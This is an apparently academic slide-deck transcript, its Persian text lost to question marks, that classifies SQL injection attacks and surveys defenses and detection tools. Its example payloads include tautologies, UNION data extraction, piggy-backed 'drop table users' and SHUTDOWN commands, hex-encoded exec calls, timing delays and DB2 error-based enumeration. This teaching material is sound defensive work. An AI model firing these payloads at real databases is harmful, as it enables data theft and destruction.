1 / 45

SQL Injection Attack SQLIA

????? ?????. ????? SQLIA????? ????? SQLIA??? ??? ???? ?? ????? SQLIA???????? ????? ? ??????? SQLIA?????? ??? ??????? SQLIA ?? ?????? ???? ??? ???. 3. ????? SQLIA. ????? ????????? ??? ?????? ?? ????? ???? ?????? ??? ???? ?? ??????? ????? ?? ?????? ????. 4. ????? ????? SQLIA. Tautologies Il

marius
Download Presentation

SQL Injection Attack SQLIA

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

    1. 1

    3. ????? ????? ????? SQLIA ????? ????? SQLIA ??? ??? ???? ?? ????? SQLIA ???????? ????? ? ??????? SQLIA ?????? ??? ?? ????? SQLIA ?? ?????? ???? ??? ??? 3

    4. ????? SQLIA ????? ????????? ??? ?? ???? ?? ????? ???? ?????? ??? ???? ?? ??????? ????? ?? ?????? ???? 4

    5. ????? ????? SQLIA Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 5

    6. Tautologies attack ????? ???? ?? ?? ???? ??? ???? ??? : ???? ?? ????? ???? ? ??????? ???? ????: ???? ???? ????? ’ or 1=1 - - ???? ??? ?????? ?? ?????: SELECT accounts FROM users WHERE login=’’ or 1=1 -- AND pass=’’ AND pin= 6

    7. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 7

    8. Illegal/Logically Incorrect Queries attack: ???? ???? ? ??????? ?????????? ???? ???? ?????? ???? ?????? ????? ? ????? ??? ??? ???? ?? ? ???? ?? ?????? ????? ??? ? ???? ????? ??? ???? ?? ???? ??? ?? ??????? ???? ????: ?????convert (int,(select top 1 name from sysobjects where xtype=’u’)) ?? ???? pin : SELECT accounts FROM users WHERE login=’’ AND pass=’’ AND pin= convert (int,(select top 1 name from sysobjects where xtype=’u’)) ????? ??? ?? sql: "Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value ’CreditCards’ to a column of data type int." ???? ????? ??? ?????? ???? ? ??? ???? ? ??? ???? ?? ?? ???? 8

    9. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 9

    10. Union Query attack ????? ???? Union ?? query ???? ??? : ????? ???????? ?????? ?? ?????? ???? ???? ???? ?? ????? ???? ?? ??????? ???? ????: ?????? ? ??????? ???? ???? ? ???? ???? ??? ???? ???? ????? ?? ???? union? ?? ???? ???? ???? ????? ??? ?? ???? login: “’ UNION SELECT cardNo from CreditCards where acctNo=10032 - -” SELECT accounts FROM users WHERE login=’’ UNION SELECT cardNo from CreditCards where acctNo=10032 -- AND pass=’’ AND pin= ??????? ???? ??? ??? ???? ??? ???? ??? ????? ???? ?? ??? 10

    11. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 11

    12. Piggy- Backed Queries attack ????? ???? query ??? ????? ?? query ???? ??? ??? ????? ? ????? ???? ? ??????? ???? ? ????? ??????? ??? ???. ????: ???? ???? ????? ??? ?? ???? pass : “’; drop table users - -” SELECT accounts FROM users WHERE login=’doe’ AND pass=’’; drop table users -- ’ AND pin=123 ??? ??? ???? ???? ??? ????? 12

    13. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 13

    14. Stored Procedures attack ??? : ??? ????? ?? ????? ??????? ?? ??? ??? ????: ??? Stored Procedure ???: CREATE PROCEDURE DBO.isAuthenticated @userName varchar2, @pass varchar2, @pin int AS EXEC("SELECT accounts FROM users WHERE login=’" +@userName+ "’ and pass=’" +@password+ "’ and pin=" +@pin); GO ?? ???? ???? “ ’ ; SHUTDOWN; - -” ?? ???? pass: SELECT accounts FROM users WHERE login=’doe’ AND pass=’ ’; SHUTDOWN; -- AND pin= ????? ??? ?????? ???? ? ??? ???? ???? ???? ?? ?? ??????? ???. 14

    15. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 15

    16. Inference attack ??????? ??????? ??? ???? ???? ? ??? ??????? ?? ???? ???? ???? ??????? ????? ? ????? ???? ??. ??? ???? ???? ?? ??? ???? ?? ????: Blind Injection : ??????? ??????? ?? ???? ?? ????? ???? . ????: ???? ???? “legalUser’ and 1=0 - -” ? “legalUser’ and 1=1 - -” ?? ?? ???? login ?? ?? ????? :   SELECT accounts FROM users WHERE login=’legalUser’and 1=0 -- ’ AND pass=’’ AND pin=0   SELECT accounts FROM users WHERE login=’legalUser’ and 1=1 -- ’ AND pass=’’ AND pin=0 ???? ??? ???? ? ???? ???? ??????? ???? login ? ??????? login ???? ???? ????? ???? ?? ??? ???? ? ??? query ??? ???? ??? ???? ??? ? ??????? login ???? ???? ???. 16

    17. 17

    18. Tautologies Illegal/Logically Incorrect Queries Union Query Piggy- Backed Queries Stored Procedures Inference Alternate Encodings 18

    19. Alternate Encodings attack ????? ???? ????? ???? ???? ????? ??? ???? ?? ??? ??? ??????? ? ???? ???? ???? ???? ???? ????? ??? ????? . ????: ???? ???? ????? “legalUser’; exec(0x73687574646f776e) - - ” ?? ???? login SELECT accounts FROM users WHERE login=’legalUser’; exec(char(0x73687574646f776e)) -- AND pass=’’ AND pin= ????? ??? ?????? ???? 19

    20. Prepared statement Stored Procedure Escaping All User Supplied Input Least Privilege White List Input Validation 20 ?????? ???? ?? ????? SQLIA

    21. ???????? ???? query ????? ???? ?? sql ???? ???? ?????? ????????? ????? type checking ??? ??? ????????? ? ?? ????? ??? ???? ??????? ??query ??????? ?? ?????? ????? ??? ???? ????? ‘ or 1=1 – ??????? ?? ?? ?? ???? ??? ????? : ??????? ?? preparedstatement ?? javaEE ??????? ?? sqlcommand ?? OleDbCommand ?? .Net ??????? ?? PDO ?? PHP (????? ???) ??????? ?? CreateQuery ?? Hibernate ? ..... ????: ??????? ?? preparedstatement ?? ???? : String custname = request.getParameter("customerName"); SELECT account_balance FROM user_data WHERE user_name = ? "; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, custname); ResultSet results = pstmt.executeQuery( ); 21 Prepared statement

    22. 22 ?? ???? ????? ???? ??? (??????? ?? ????? query ???????? ?? ???? ????) ????? ???? ?? ?????? ???? (?? ???? preparedStatement) ????? : ???? ?????? : ????? ???? ?????? ??????? ?? ??????? ?? stored procedure (??? ????? ????? query ????????) ???? ??? ?????? : ??? ???? ?? ??? sql ?? ?? ???? ? ??????? ???? ??? ?? ????? ??????? ????: ??????? ?? stored procedure ?? ???? ??? ?? ???? : String custname = request.getParameter("customerName"); CallableStatement cs = connection.prepareCall("{call sp_getAccountBalance(?)}"); cs.setString(1, custname); ResultSet results = cs.executeQuery(); Stored procedure

    23. 23 Escaping User Input ????? ?? blacklist ?? ??????????? ?? ???? ????? ????. ????? ?????????? ?? ???? ?? query (????????( ‘ ) ?? (‘ ‘) ) ???? : ??????? ?? ???? () mysql_real_escape_string ?? PHP : $query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'", mysql_real_escape_string($Username), mysql_real_escape_string($Password)); mysql_query($query); ????? ????( ???? ??? ?? ??? ??????? ?????? ???) ??????? ?? ??? ??? ?? oracle ? my sql ? sql server

    24. 24 Least privilege ???? ??? SQLIA ?? ???? ????? privilege ???? ?? ??????? ?????? ???? ???? ?????? read ?? ?????? ?? ??? ?? read ????. ??????? ?? view ???? ???????? ?? ?? ????? ?? ?? ???? ???? ?????? ????? ?????. ??? ?????? ?????? ??????? ?? ?????? ???? ?? ??????? ?? stored procedure ??? ????? DBMS ?? ????? root ?? system ???? : MySql ?? ???? ??? ??? ?? ???? system ??? windows ???? ?? ???.

    25. 25 White List Input Validation ????? ???? ????? ??? ????? ?????? ???? ????? ??? ?? ??????? ?? ?? query ????? ?????? ?????????? ??? ?? ???? regular expression ?? ???? ????? ???? ?? ???? ???? ????? ????? ???? email ? zipcode ?????? ?????? ??? ?? ?????? ?? ????? ??? ???? ????? ???? ?? ????? ??? text free (???? ???? ????) ????? ???? ??? ????? ?? ??? ??????? ?? ?????????? non printable ??????? ?? ????? ?????????? ????? ESAPI ????? : getValidDate() getValidCreditCard() getValidSafeHTML() getValidInput() getValidNumber() getValidFileName() getValidRedirectLocation()

    26. 26 (?????)White List Input Validation

    27. ???????? ??????? SQLIA WAVES: ????? ??? ???? ???? ??????? ???? ???? ???? ??? SQLIA ????? ???? ?? ??????? ?? ????? ??????? ????? ????? ????? ?????? ?? ????? ????? ???? ???? DBC-Checker : ??? ????? ?????? ?? ????? ??? query ??? ???????? ??????? ????? ?????? ?? ???? ?? WebSSARI : ???????? ?? PHP ?????????? ???? ??? ???? ???? ?? (runtime guard) ????? ??????? ??????? ?? ???? ???? ????? ??????? ?????? ??? ???? ????. 27

    28. ???????? ??????? SQLIA(?????) Java Static Tainting: ??????? ?? ????? ??? ????? ????? ?? ??? ??????(taint) ????? ?? ?? ??? ????? ??? ???? ???? taint ????? ????? ???????? ??? ??????? ???? ??????? ? ????? taint ?? ?????? query. ????? ??? : ??????? ????????? ?????? ??? SQLIA ????? false positive ???? SecuriFly: ??????? ?? ???? PQL ????? ????? ???? ?? ?? ?????? ??????? ????? ??? taint ??? ?? ???? ???? ????? ???? ????? ??????? ?? ???? ?? ?? ??? ?? ???? SQL DOM: ?????? ???? ?????? ???? ??????? ?? API ??? ????? query ?? ??? ????? query ???? ????? ?? ??? ????. ??????? ?? type checking ???? ????? ????? ?? API 28

    29. 29 ?????? ???????? ???????

    30. ???????? ????? SQLIA SQL Guard : ????? ????? ????? ? ???? ????? ??? ???? ????? ??? ???? ?????? ????? ????? ?? ??? ?? ???? ??? ??? ???? ???? ??? ??? . SQL Check : ????? ??? ??? ????? : ????? ??? ?? ??? ????? ???? ???? Proxy filtering : ????? ??????? ???? ???? ????? ?? ??? ?????? (SPDL) ?? ?????????? ???????? ??? ?? ????? ???? ?? ????. ????? ???: ?????? ???? ?????? ??? ?? ???? ?? ? ?? ?? ??????? ???????? ???? ????? ????. SQLrand: ??????? ?? ?????????? ?????? ?? ??? ????? ????? sql ? ????? ???? ?? ?????? ???? ???? proxy filter? ?? ????? ????? sql. ????? ???: ??????? ?? ???? ???? ????? ???????? ????? ???? ????? ??????? ?? proxy. SAFELI: ???? ??? ????? ???? ????? ?? ?? ???? ???????. ????? ???? ????? ??? ?????? ???? ???? ???? ???? ????? ???: ??? ???? ?????????? ?? ????. 30

    31. ???????? ????? SQLIA (?????) Java Dynamic Tainting: ????? ?? ??? ???? ???? taint ?? ???? ???? ??????? ?? flag ???? ????? ????? ????? taint ??????? ?? untainting ???? ???? ??? ????? ??? ?? taint SWaddler : ?? ??? ????? ????? ?? ??? ??? ????? ????? ??? ????????? ?? ???? ???? ????? ? ??? ???? ?????? ????? ?????? ? ????? ????? ?????? ??? ????? ????. Tautology Checker: ???? ??? ????? ???? ? tautology . AMNESIA: ???? ????? ?? ??? ? ????? ????? ????? ? ???? ????? ????? : ????? ??? ???? ????? query ??? ????? ?? ????? ?? ????? ???? ??? ????? ???? : ?????? query ????? ?? ??? ????? ??? ?? ????? ????? SQLI ?????? ?? ????? ????? ??? ????? CANDID: ???? ???? ???? ????? ?????? query ?? ??? dynamic candidate evolution ????? ???? ?? ?????? query ????? ?? ?????? ???? ??? ?????? ????. ????? ????? ??? ????? ????? sql. 31

    32. ?????? ??? ??? ????? 32

    33. ??? ????? ?? ??????? stored procedure ?? ???? ??????? ????? ? ??????? tautology attack ?? ???? ??????? 33 ????? ?????? ??? ??

    34. ????? SQLIA ?? ?????? ???? ??? ??? Oracle SQL injection in webapps SQL injection in postgresql SQL Injection in SQL Server SQL injection in DB2 SQL injection in MySQL 34

    35. Sql injection in postgresql Sleep function: 35

    36. Exploiting Blind SQL Injection in PostgreSQL:

    37. 37

    38. SQL Injection in SQL Server: ?????? ?? account ?? ?? ???? ???? ????? 'OPENROWSET‘ ????? ???? ? ????? ??? ????? ????? 'OPENROWSET‘ ?? ????????? ODBC ???? ?????? ?????? ????? ?????? ? Excel? local MS Access databases ? ???? ??? ???? ???????. Timing attack: waitfor delay '0:0:5' ??? ??: ??????? ?? parameterised API ( ????????? ????? ????) ??????? ?? registry patch ??? ??? ???? ???? ?????? ?? ??? ? ?? ??? 'ad-hoc' ???? OPENROWSET . ????? ? ????? ??? ? ????? ??????? ???? ???? ???????? ?? ?????. ???? ?? ???????? ???? ? ????? ? ?????? ??? ??????? ????? ??? ????? ?????? ????? 38

    39. SQL injection in DB2 database ?? ??? ???? ???? detailed error messages: ??? Username = ‘ or 1=1— ?????? ? ???? ?? ????: Welcome Bob ??? Username = ‘ group by 1—? (??? ???? ????? ???? ???? ??) An expression starting with "NAME" specified in a SELECT clause<snip>   ??? Username = ‘ group by name— An expression starting with "SOCIAL_SECURITY_NO" specified in a SELECT clause<snip> ????? ??? ???? ?? ??????? ?? brute force attack: Username = ‘ or ‘ ‘ or ; 9,9,9  An unexpected token "from applogin where name = '' OR" was found<snip> ??????? ????? ???? ?? : Username = ' union all select concat(name,password) as name ,'a','a','a' from applogin where name > 'c'; ?????? ???? ?? ????: Welcome joeqwerty 39

    40. MySQL : MySQL.com Victim of SQL Injection Attack ?? ??????? ??URL ??? ? ??????? ?? id ??? ?????? ?? ???? ?? Customer View ??? ????? ??? ????? ?????? ???? ???. 40

    41. 41

    42. ??? ??: ??????? ?? Mysql_escape_string ???? ???? sql query ??? ??????? ?? bind variable ? ??????? ?? parametrized sql statement ??? ??????? ?? string concatenation? ??????? ?? ???????? ???. ????? ???? ????? ?? ?? ????? ???? ????? ?? ???? ?? ?? ???? ? application ??? ????? ??? ??? ????? ??????? ?????? ?????? ? ???????? ???. 42

    43. William G.J. Halfond, Jeremy Viegas, and Alessandro Orso , “A Classification of SQL Injection Attacks and Countermeasures “, College of Computing Georgia Institute of Technology,IEEE ,2006 , Pages:1-11 S. W. Boyd and A. D. Keromytis. SQLrand: Preventing SQL Injection Attacks. In Proceedings of the 2nd Applied Cryptography and Network Security (ACNS) Conference, pages 292-302. June 2004. Atefeh Tajpour , Maslin Massrum , Mohammad zaman Heydari ,” Comparison of SQL Injection Detection and Prevention Techniques”, 2nd International Conforence on Education Technology and Computer (ICETC) , 2010 , Pages : 1-6 Prithvi Bisht, P. Madhusudan. CANDID: Dynamic Candidate Evaluations for Automatic Prevention of SQL Injection Attacks.Proceedings of the 14th ACM Conference on Computer and Communications Security. 2007. USA: ACM, Pages 3-4. V. Haldar, D. Chandra, and M. Franz. Dynamic Taint Propagation for Java. In Proceedings 21st Annual Computer Security Applications Conference, Dec. 2005 . M. Martin, B. Livshits, and M. S. Lam. Finding Application Errors and Security Flaws Using PQL: A Program Query Language. In Proceedings of the 20th Annual ACM SIGPLAN conference on Object oriented programming systems languages and applications (OOPSLA 2005). Y. Huang, F. Yu, C. Hang, C. H. Tsai, D. T. Lee, and S. Y. Kuo. Securing Web Application Code by Static Analysis and Runtime Protection. In Proceedings of the 12th International World Wide Web Conference (WWW 04), May 2004. Marco Cova, Davide Balzarotti. Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications. In Proceedings of the 10th International Symposium on Recent Advances in Intrusion Detection (RAID), (Queensland, Australia), September 5-7, 2007. “SQL Injection in Oracle Forms V1.01 from “Red-Database-Security GmbH, 2005. Cyrus Peikari, Seth Fogie, “Guarding Against SQL Server Attacks:Hacking, cracking, and protection techniques”, AirScanner, 2003. Chris Anley, “Advanced SQL Injection “, An NGSSoftware Insight Security Research (NISR), 2002. Atefeh Tajpour , Maslin Massrum , Mohammad zaman Heydari, Suhaimi Ibrahim, SQL Injection Detection and Prevention Tools Assessment, IEEE,2010,Pages 1-5 J. Pullicino,” MySQL.com Victim of SQL Injection Attack, April 2011. L. Juranic, “Advanced PostgreSQL SQL Injection and Filter Bypass Techniques”,INFIGO-TD, 2009. S. Kost,”An Introduction to SQL Injection Attacks for Oracle Developers”, March 2009. “How to mine data from a DB2 database with SQL injection”, archives.neohapsis.com. 43 ?????

    45. 45

More Related